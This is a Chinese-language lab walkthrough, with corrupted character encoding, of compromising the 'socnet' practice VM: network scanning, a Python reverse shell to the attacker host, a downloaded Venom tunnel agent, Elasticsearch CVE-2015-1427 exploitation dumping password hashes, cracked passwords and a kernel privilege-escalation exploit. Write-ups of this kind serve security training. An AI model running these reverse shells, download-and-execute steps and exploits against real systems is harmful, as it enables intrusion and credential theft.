medium socnet

● 主機(jī)發(fā)現(xiàn)

┌──(root?kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:3e:92:fb, IPv4: 192.168.10.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1    00:50:56:ff:c4:ee       VMware, Inc.
192.168.10.2    00:50:56:c0:00:08       VMware, Inc.
192.168.10.15   00:0c:29:74:e0:7d       VMware, Inc.
192.168.10.254  00:50:56:f1:51:7f       VMware, Inc.

● 端口服務(wù)掃描

┌──(root?kali)-[~]
└─# nmap -p- 192.168.10.15
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-10 02:17 EST
Nmap scan report for 192.168.10.15
Host is up (0.00064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
MAC Address: 00:0C:29:74:E0:7D (VMware)

┌──(root?kali)-[~]
└─# nmap -p22,5000 -sC -sV 192.168.10.15

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 cc:53:20:b8:10:db:52:5f:16:02:bc:ee:57:22:80:e1 (DSA)
|   2048 01:50:f6:1f:32:e8:0d:fc:48:38:3e:c8:1b:ac:20:02 (RSA)
|   256 3b:ae:9a:bd:cb:ff:8f:54:64:32:ec:bf:38:fd:fe:6b (ECDSA)
|_  256 77:4e:8b:20:73:52:a4:ee:93:1d:b3:85:f2:25:d7:55 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
MAC Address: 00:0C:29:74:E0:7D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

● web信息收集

用瀏覽器訪問(wèn)http://192.168.10.15:5000娃善,但在頁(yè)面上并沒(méi)有發(fā)現(xiàn)有用的信息

對(duì)http://192.168.10.15:5000進(jìn)行目錄掃描,發(fā)現(xiàn)一個(gè)隱藏目錄admin

┌──(root?kali)-[~]
└─# dirsearch -u  http://192.168.10.15:5000

  _|. _ _  _  _  _ _|_    v0.4.2                                                        
 (_||| _) (/_(_|| (_| )                                                                 
                                                                                        
Target: http://192.168.10.15:5000/

[02:27:15] Starting: 
[02:27:20] 200 -  401B  - /admin                                            
                                                                             
Task Completed  
瀏覽器訪問(wèn)http://192.168.10.15:5000/admin链嘀,發(fā)現(xiàn)可以執(zhí)行命令

● 代碼注入

使用Python反彈shell懂版,這段代碼將使用鹃栽!先nc在Kali主機(jī)上監(jiān)聽(tīng)TCP5555端口

http://192.168.10.15:5000/admin輸入Python Shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.100",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

● 反彈shell

┌──(root?kali)-[~]
└─# nc -lvnp 5555                       
listening on [any] 5555 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.15] 40592
/app # 
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),
20(dialout),26(tape),27(video)
/app #  whoami
root
/app # ls
Dockerfile
main.py
requirements.txt
templates
/app # 

● 信息搜集

發(fā)現(xiàn)收到Shell為docker主機(jī)的root權(quán)限,但發(fā)現(xiàn)處于容器環(huán)境中

Tip:判斷主機(jī)為Docker容器的兩種方法:
方法一:確認(rèn)根目錄下是否存在.dockerenv文件
ls /.dockerenv
方法二:查看/proc/1/cgroup是否存在docker目錄
cat /proc/1/cgroup

/app # ls /.dockerenv
/.dockerenv
/app # cat /proc/1/cgroup
11:hugetlb:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
10:perf_event:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
9:blkio:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
8:freezer:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
7:devices:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
6:memory:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
5:cpuacct:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
4:cpu:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
3:cpuset:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
2:name=systemd:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
/app # 

內(nèi)網(wǎng)主機(jī)掃描結(jié)果,發(fā)現(xiàn)172.17.0.1躯畴,172.17.0.2民鼓,172.17.0.3為存活主機(jī)

/app # for i in $(seq 1 254); do ping -c 1 172.17.0.$i; done
PING 172.17.0.1 (172.17.0.1): 56 data bytes
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.044 ms

--- 172.17.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.044/0.044/0.044 ms
PING 172.17.0.2 (172.17.0.2): 56 data bytes
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.041 ms

--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.041/0.041/0.041 ms
PING 172.17.0.3 (172.17.0.3): 56 data bytes
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.035 ms

--- 172.17.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.035/0.035/0.035 ms
PING 172.17.0.4 (172.17.0.4): 56 data bytes

● 內(nèi)網(wǎng)穿透

部署Venom內(nèi)網(wǎng)穿透工具

Kali主機(jī)Venom目錄啟動(dòng)Python3 Http Server,將Venom中的代理端程序傳給目標(biāo)靶機(jī)
python3 -m http.server 80

┌──(root?kali)-[~/桌面/venom]
└─# python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.10.15 - - [10/Feb/2023 03:01:33] "GET /agent_linux_x64 HTTP/1.1" 200 -

啟動(dòng)Venom管理端蓬抄,監(jiān)聽(tīng)本地9999端口
./admin_linux_x64 -lport 9999

┌──(root?kali)-[~/桌面/venom]
└─# ./admin_linux_x64 -lport 9999
Venom Admin Node Start...

  ____   ____  { v1.1  author: Dlive }                                                  
  \   \ /   /____   ____   ____   _____                                                 
   \   Y   // __ \ /    \ /    \ /     \                                                
    \     /\  ___/|   |  (  <_> )  Y Y  \                                               
     \___/  \___  >___|  /\____/|__|_|  /                                               
                \/     \/             \/                                                
                                                                                        
(admin node) >>> 
[+]Remote connection:  192.168.10.15:36290
[+]A new node connect to admin node success     客戶端成功上線

靶機(jī)端安裝客戶端64位版本
cd /tmp
wget -c http://192.168.10.100/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 192.168.10.100 -rport 9999
客戶端成功上線

┌──(root?kali)-[~]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.15] 58313
/app # 
/app # cd /tmp  
/tmp # ls
/tmp #                                                                              
/tmp # wget -c http://192.168.10.100/agent_linux_x64
Connecting to 192.168.10.100 (192.168.10.100:80)
agent_linux_x64      100% |*******************************|  3791k  0:00:00 ETA

/tmp # ls
agent_linux_x64
/tmp # chmod +x agent_linux_x64
/tmp # ./agent_linux_x64 -rhost 192.168.10.100 -rport 9999
2023/02/10 08:02:03 [+]Successfully connects to a new node
客戶端成功上線

查看丰嘉、控制Venom節(jié)點(diǎn)、啟動(dòng)socks隧道

┌──(root?kali)-[~/桌面/venom]
└─# ./admin_linux_x64 -lport 9999
Venom Admin Node Start...

  ____   ____  { v1.1  author: Dlive }                                                  
  \   \ /   /____   ____   ____   _____                                                 
   \   Y   // __ \ /    \ /    \ /     \                                                
    \     /\  ___/|   |  (  <_> )  Y Y  \                                               
     \___/  \___  >___|  /\____/|__|_|  /                                               
                \/     \/             \/                                                
                                                                                        
(admin node) >>> 
[+]Remote connection:  192.168.10.15:36290
[+]A new node connect to admin node success     客戶端成功上線
(admin node) >>> show 
A
+ -- 1
(admin node) >>> goto 1          進(jìn)入客戶端
node 1
(node 1) >>> socks 1080          在客戶端開(kāi)socks端口嚷缭,用1080端口代理服務(wù)端流量到內(nèi)網(wǎng)網(wǎng)段
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>> 

venom服務(wù)器(KALI)掛Socks對(duì)內(nèi)網(wǎng)進(jìn)行掃描

為實(shí)現(xiàn)用kali的強(qiáng)大功能對(duì)內(nèi)網(wǎng)網(wǎng)段進(jìn)行滲透供嚎,
需修改proxychains配置:使用sock5服務(wù),啟用本地1080端口轉(zhuǎn)發(fā)kali發(fā)向內(nèi)網(wǎng)的流量
vi /etc/proxychains4.conf
修改最后一行為:
socks5 127.0.0.1 1080

sudo proxychains nmap -Pn -sT -sV 172.17.0.1

Nmap scan report for 172.17.0.1   的結(jié)果
Host is up (0.0096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

sudo proxychains nmap -Pn -sT -sV 172.17.0.2

Nmap scan report for 172.17.0.2   的結(jié)果
Host is up (0.0063s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
9200/tcp open  http    Elasticsearch REST API 1.4.2 (name: Ka-Zar; cluster: elasticsearch; Lucene 4.10.2)

sudo proxychains nmap -Pn -sT -sV 172.17.0.3

sudo proxychains nmap -Pn -sT -sV 172.17.0.3    的結(jié)果

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.3:5000  ...  OK
Nmap scan report for 172.17.0.3
Host is up (0.0095s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15)

● 漏洞利用
利用Elasticsearch漏洞獲取目標(biāo)靶機(jī)登錄用戶名和密碼

┌──(root?kali)-[~/桌面/venom]
└─# searchsploit elasticsearch                              
------------------------------------------------------ ---------------------------------
 Exploit Title                                        |  Path
------------------------------------------------------ ---------------------------------
ElasticSearch - Remote Code Execution                 | linux/remote/36337.py
ElasticSearch - Remote Code Execution                 | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metaspl | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download         | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure              | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Executi | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump    | multiple/webapps/50152.py
------------------------------------------------------ ---------------------------------
Shellcodes: No Results


┌──(root?kali)-[~/桌面/venom]
└─# cp /usr/share/exploitdb/exploits/linux/remote/36337.py .




┌──(root?kali)-[~/桌面/venom]
└─# sudo proxychains python2 36337.py 172.17.0.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16

▓█████  ██▓    ▄▄▄        ██████ ▄▄▄█████▓ ██▓ ▄████▄    ██████  ██? ██ ▓█████  ██▓     ██▓                                                                                     
▓█   ? ▓██?   ?████▄    ?██    ? ▓  ██? ▓?▓██??██? ?█  ?██    ? ▓██? ██?▓█   ? ▓██?    ▓██?                                                                                     
?███   ?██?   ?██  ?█▄  ? ▓██▄   ? ▓██? ???██??▓█    ▄ ? ▓██▄   ?██??██??███   ?██?    ?██?                                                                                     
?▓█  ▄ ?██?   ?██▄▄▄▄██   ?   ██?? ▓██▓ ? ?██??▓▓▄ ▄██?  ?   ██??▓█ ?██ ?▓█  ▄ ?██?    ?██?                                                                                     
??████??██████?▓█   ▓██??██████??  ?██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████?                                                                                 
?? ?? ?? ??▓  ???   ▓?█?? ?▓? ? ?  ? ??   ?▓  ? ?? ?  ?? ?▓? ? ? ? ??????? ?? ?? ??▓  ?? ??▓  ?                                                                                 
 ? ?  ?? ? ?  ? ?   ?? ?? ??  ? ?    ?     ? ?  ?  ?   ? ??  ? ? ? ??? ? ? ?  ?? ? ?  ?? ? ?  ?                                                                                 
   ?     ? ?    ?   ?   ?  ?  ?    ?       ? ??        ?  ?  ?   ?  ?? ?   ?     ? ?     ? ?                                                                                    
   ?  ?    ?  ?     ?  ?      ?            ?  ? ?            ?   ?  ?  ?   ?  ?    ?  ?    ?  ?                                                                                 
                                              ?                                         
 Exploit for ElasticSearch , CVE-2015-1427   Version: 20150309.1                        
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ cat passwords
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.2:9200  ...  OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814 
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
~$ id
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.2:9200  ...  OK
uid=0(root) gid=0(root) groups=0(root)

● 密碼破解

john:3f8184a7343664553fcb5337a3138814
1337hack
test:861f194e9d6118f3d942a72be3e51749
1234test
admin:670c3bbc209a18dde5446e5e6c1f1d5b
1111pass
root:b3d34352fc26117979deabdf1b9b6354
1234pass
jane:5c158b60ed97c723b673529b8a3cf72b
1234jane

● 本地提權(quán)

通過(guò)依次嘗試峭状,john:1337hack可以登錄目標(biāo)靶機(jī)

┌──(root?kali)-[~/桌面/venom]
└─# ssh john@192.168.10.15
john@192.168.10.15's password: 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri Feb 10 11:18:26 EST 2023

  System load:  0.0                Processes:           390
  Usage of /:   12.8% of 14.64GB   Users logged in:     0
  Memory usage: 5%                 IP address for eth0: 192.168.10.15
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Oct 28 22:36:16 2018 from 10.0.0.8
john@socnet:~$ 
john@socnet:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@socnet:~$ whoami
john
john@socnet:~$ 

john用戶提權(quán)失敗克滴,

john@socnet:~$ sudo -s
[sudo] password for john: 
john is not in the sudoers file.  This incident will be reported.

嘗試內(nèi)核提權(quán)

john@socnet:~$ uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
john@socnet:~$ 

找漏洞利用代碼

──(root?kali)-[~/桌面/venom]
└─# searchsploit linux 3.13.0 ubuntu     
------------------------------------------------------ ---------------------------------
 Exploit Title                                        |  Path
------------------------------------------------------ ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/ | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/ | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) -  | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X8 | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Lo | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Pri | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilt | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16 | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / L | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via Us | linux/local/41760.txt
------------------------------------------------------ ---------------------------------
Shellcodes: No Results

但是靶機(jī)沒(méi)有安裝gcc

john@socnet:~$ gcc -v
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
john@socnet:~$ 

且查看37292.c腳本發(fā)現(xiàn),還需編譯ofs-lib.so文件优床。所以考慮把ofs-lib.so文件從lib文件復(fù)制出劝赔,并注釋掉37292.c相關(guān)代碼再便宜,并將編譯后的文件和ofs-lib.so共同上傳目標(biāo)靶機(jī)

┌──(root?kali)-[~/桌面/venom/bbbb]
└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c .

┌──(root?kali)-[~/桌面/venom/bbbb]
└─# vim 37292.c 
注釋掉相關(guān)代碼
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
查找ofs-lib.so文件位置                                                                                                   
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .

┌──(root?kali)-[~/桌面/venom/bbbb]
└─# gcc -o exp 37292.c 

┌──(root?kali)-[~/桌面/venom/bbbb]
└─# ls
36337.py  37292.c  exp  ofs-lib.so

編譯好的exp和ofs-lib.so上傳至目標(biāo)靶機(jī)

kali啟動(dòng)http server

┌──(root?kali)-[~/桌面/venom/bbbb]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

靶機(jī)
在靶機(jī)上下載exp和ofs-lib.so

cd /tmp
wget http://192.168.10.100/exp
wget http://192.168.10.100/ofs-lib.so

john@socnet:/tmp$ ls
exp  ofs-lib.so
john@socnet:/tmp$ 
john@socnet:/tmp$ chmod +x exp
john@socnet:/tmp$ ./exp
./exp: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exp)

尷尬了胆敞,執(zhí)行不了着帽。杂伟。。仍翰。

只能試試?yán)戏椒撕罩啵遣磺泻蠈?shí)戰(zhàn)要求
就是給靶機(jī)安裝好gcc和g++
然后把.c源文件上傳到靶機(jī)里,在靶機(jī)里編譯好后執(zhí)行予借。

john@socnet:/tmp$ gcc 37292.c 
john@socnet:/tmp$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
# id 
uid=0(root) gid=0(root) groups=0(root),1001(john)
# whoami
root
# ls -al
total 56
drwxrwxrwt  3 root root  4096 Feb 10 07:29 .
drwxr-xr-x 22 root root  4096 Oct 27  2018 ..
-rwxrwxr-x  1 john john  4975 Feb 10 06:54 37292.c
-rwxrwxr-x  1 john john 13652 Feb 10 07:29 a.out
-rwxrwxr-x  1 john john 16936 Feb 10 06:54 exp
drwxr-xr-x  2 root root  4096 Feb 10 07:23 gcc
# pwd
/tmp
# 

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末越平,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子灵迫,更是在濱河造成了極大的恐慌秦叛,老刑警劉巖,帶你破解...
    沈念sama閱讀 211,561評(píng)論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件瀑粥,死亡現(xiàn)場(chǎng)離奇詭異挣跋,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)狞换,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,218評(píng)論 3 385
  • 文/潘曉璐 我一進(jìn)店門避咆,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人修噪,你說(shuō)我怎么就攤上這事查库。” “怎么了割按?”我有些...
    開(kāi)封第一講書(shū)人閱讀 157,162評(píng)論 0 348
  • 文/不壞的土叔 我叫張陵膨报,是天一觀的道長(zhǎng)磷籍。 經(jīng)常有香客問(wèn)我适荣,道長(zhǎng),這世上最難降的妖魔是什么院领? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 56,470評(píng)論 1 283
  • 正文 為了忘掉前任弛矛,我火速辦了婚禮,結(jié)果婚禮上比然,老公的妹妹穿的比我還像新娘丈氓。我一直安慰自己,他們只是感情好强法,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,550評(píng)論 6 385
  • 文/花漫 我一把揭開(kāi)白布万俗。 她就那樣靜靜地躺著,像睡著了一般饮怯。 火紅的嫁衣襯著肌膚如雪闰歪。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 49,806評(píng)論 1 290
  • 那天蓖墅,我揣著相機(jī)與錄音库倘,去河邊找鬼临扮。 笑死,一個(gè)胖子當(dāng)著我的面吹牛教翩,可吹牛的內(nèi)容都是我干的杆勇。 我是一名探鬼主播,決...
    沈念sama閱讀 38,951評(píng)論 3 407
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼饱亿,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼蚜退!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起路捧,我...
    開(kāi)封第一講書(shū)人閱讀 37,712評(píng)論 0 266
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤关霸,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后杰扫,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體队寇,經(jīng)...
    沈念sama閱讀 44,166評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,510評(píng)論 2 327
  • 正文 我和宋清朗相戀三年章姓,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了佳遣。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,643評(píng)論 1 340
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡凡伊,死狀恐怖零渐,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情系忙,我是刑警寧澤诵盼,帶...
    沈念sama閱讀 34,306評(píng)論 4 330
  • 正文 年R本政府宣布,位于F島的核電站银还,受9級(jí)特大地震影響风宁,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜蛹疯,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,930評(píng)論 3 313
  • 文/蒙蒙 一戒财、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧捺弦,春花似錦饮寞、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 30,745評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至寞钥,卻和暖如春慌申,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背凑耻。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 31,983評(píng)論 1 266
  • 我被黑心中介騙來(lái)泰國(guó)打工太示, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留柠贤,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 46,351評(píng)論 2 360
  • 正文 我出身青樓类缤,卻偏偏與公主長(zhǎng)得像臼勉,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子餐弱,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,509評(píng)論 2 348

推薦閱讀更多精彩內(nèi)容